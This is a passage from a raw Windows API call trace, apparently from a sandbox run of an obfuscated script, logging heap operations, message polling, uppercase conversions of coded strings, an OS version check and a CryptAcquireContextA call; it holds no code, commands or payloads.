hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0211.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.571] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.572] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.572] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.572] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.572] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.572] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.572] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.572] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.574] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.574] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.575] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.575] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.576] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.576] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.576] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.576] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.576] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.576] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0211.577] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.577] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.577] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.577] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.577] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.577] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0211.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.577] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.577] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.577] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.577] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.577] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.577] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.577] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7220, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.578] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c2a8) returned 1 [0211.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.579] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0211.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.579] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0211.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.579] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.579] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.579] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0211.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.580] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0211.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.580] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.580] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.580] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.580] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.580] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.580] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.580] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.581] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.581] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.581] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.581] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.581] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, 